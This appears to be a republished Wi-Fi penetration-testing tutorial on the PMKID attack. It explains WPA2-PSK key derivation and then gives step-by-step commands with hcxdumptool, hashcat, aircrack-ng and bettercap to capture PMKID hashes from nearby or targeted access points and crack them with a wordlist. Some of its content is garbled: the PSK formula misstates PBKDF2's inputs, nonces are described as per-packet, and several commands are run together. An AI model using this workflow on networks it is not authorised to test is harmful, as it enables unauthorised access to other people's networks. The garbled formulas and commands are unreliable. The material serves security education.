Mastering the PMKID Attack: A Step‑by‑Step Guide to Wi‑Fi Penetration Testing
This article walks through the theory and practical exploitation of the Wi‑Fi PMKID attack, covering authentication basics, the WPA/WPA2 handshake, PMKID generation, and detailed step‑by‑step instructions using tools such as hcxdumptool, hashcat, aircrack‑ng, Airgeddon and bettercap to capture and crack PMKID hashes.
Open System Authentication
Open System Authentication (OSA) is the authentication process defined in the original WEP protocol, allowing a client to connect to any WEP network.
Client discovers SSID and sends a connection request.
AP returns a response.
Client sends an association or authentication request.
AP generates a session‑specific authentication code and sends it to the client.
Shared Key Authentication
Shared Key Authentication is a WEP authentication method that requires the client and the AP to share the same pre‑shared Wi‑Fi password.
Client discovers SSID and sends a connection request.
AP sends an encrypted file that can only be decrypted with the Wi‑Fi password.
Client enters the password and sends an authentication request frame.
AP validates the decrypted file and grants access if the key is correct.
WPA/WPA2 PSK Overview
The article focuses on WPA2‑PSK (pre‑shared key) authentication and the unicast mode between AP and client.
PSK is derived as:
PSK = PBKDF2_SHA1(Wi‑Fi password + SSID, SSID length, 4096 iterations)
In WPA2‑PSK the pre‑shared key is the Pairwise Master Key (PMK). The actual traffic encryption key is derived from the PMK.
PTK = PMK + Anonce + Snonce + MAC(AP) + MAC(Supplicant)
Authenticator = AP
Supplicant = Client
Anonce = AP‑generated random nonce per packet
Snonce = Client‑generated random nonce per packet
For broadcast/multicast the keys become GTK and GMK, derived from the master session key.
Four‑Way Handshake
The four‑way handshake converts source key material into data‑encryption material.
Both client and AP know the PMK, but the PMK itself is not used directly for encrypting data; a PTK is derived from it.
Handshake steps (simplified):
AP sends Anonce; client generates PTK using PMK, MAC addresses, Anonce and its own Snonce.
Client returns Snonce; AP generates the same PTK and includes a MIC field set to 1.
AP derives GTK from GMK, encrypts it with PTK, and sends it to the client.
Client confirms key installation.
PMK Cache and PMKID
After a successful handshake, the AP and client maintain a PMK Security Association (PMKSA) cache.
PMKSA = PMKID + PMK lifetime + MAC addresses + other variables.
PMKID = HMAC‑SHA1‑128(PMK, "PMK Name" + MAC(AP) + MAC(Supplicant))
The router stores the PMKID; on subsequent connections it can validate the PMKID instead of performing the full handshake, reducing roaming latency.
PMKID Attack Principle
Only routers with roaming enabled expose the PMKID vulnerability.
Attack flow:
Capture PMKID → guess Wi‑Fi password with a dictionary → derive PMK → compute PMKID → compare with captured PMKID.
Wi‑Fi password (guessed)
Wi‑Fi SSID (known)
SSID length (known)
MAC addresses of AP and client (known)
PMK Name string (known)
Hashcat lists the following advantages for the PMKID attack:
No legitimate client needed ("no‑client" attack).
No need to wait for a full four‑way handshake.
Avoids retransmission issues of EAPOL frames.
Unaffected by client password entry errors.
Works even when the client is out of range.
Faster because fixed nonces and replay counters are not required.
Produces a simple hexadecimal hash string, no special capture formats needed.
Capturing PMKID with hcxdumptool
Install the required tools and put the Wi‑Fi adapter into monitor mode:
apt install hcxtools aircrack-ng start wlan0Capture PMKID frames from all surrounding APs:
hcxdumptool -o demo -i wlan0mon --enable_status 5Option --enable_status 5 shows only authentication and EAP/EAPOL frames; PMKID can also be captured with status 1.
Converting and Cracking with hashcat
Convert the captured pcapng file to a hashcat‑compatible hash: hcxpcaptool -z hash demo Rename the output to pmkidhash and run hashcat:
hashcat -m 16800 --force hash /usr/share/wordlists/rockyou.txt --showTargeted Capture of a Single AP
Record the target AP’s MAC address in a file named target. Then capture only that AP’s PMKID:
hcxdumptool -o raj -i wlan0mon --enable_status=1 --filterlist_ap=target --filtermode=2Convert and crack as before:
hcxpcaptool -z pmkidhash raj
hashcat -m 16800 --force pmkidhash /usr/share/wordlists/rockyou.txt --showAlternative Tools: aircrack‑ng , Airgeddon, bettercap
Convert the pcapng file to pcap and crack directly with aircrack‑ng:
file demo
tcpdump -r demo -w demo.pcap
aircrack-ng demo.pcap -w /usr/share/wordlists/rockyou.txtAirgeddon provides a menu‑driven CLI that automates the entire PMKID capture and cracking workflow with a few numeric selections.
Using bettercap (after installing an older libpcap version) the steps are:
wget http://old.kali.org/kali/pool/main/libp/libpcap/libpcap0.8_1.9.1-4_amd64.deb
dpkg -i libpcap0.8_1.9.1-4_amd64.deb
bettercap
set wifi.interface wlan0mon
wifi.recon on
wifi.show
wifi.assoc 68:14:01:5a:0e:9cCaptured PMKID is saved to /root/bettercap-wifi-handshakes.pcap. Convert and crack with hashcat as shown earlier.
Conclusion
The PMKID attack poses a serious threat to both home and enterprise Wi‑Fi networks because it can be performed without a legitimate client and without capturing a full four‑way handshake. Using strong passwords and migrating to WPA3 are essential mitigations.
Signed-in readers can open the original source through BestHub's protected redirect.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.
Black & White Path
We are the beacon of the cyber world, a stepping stone on the road to security.
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.
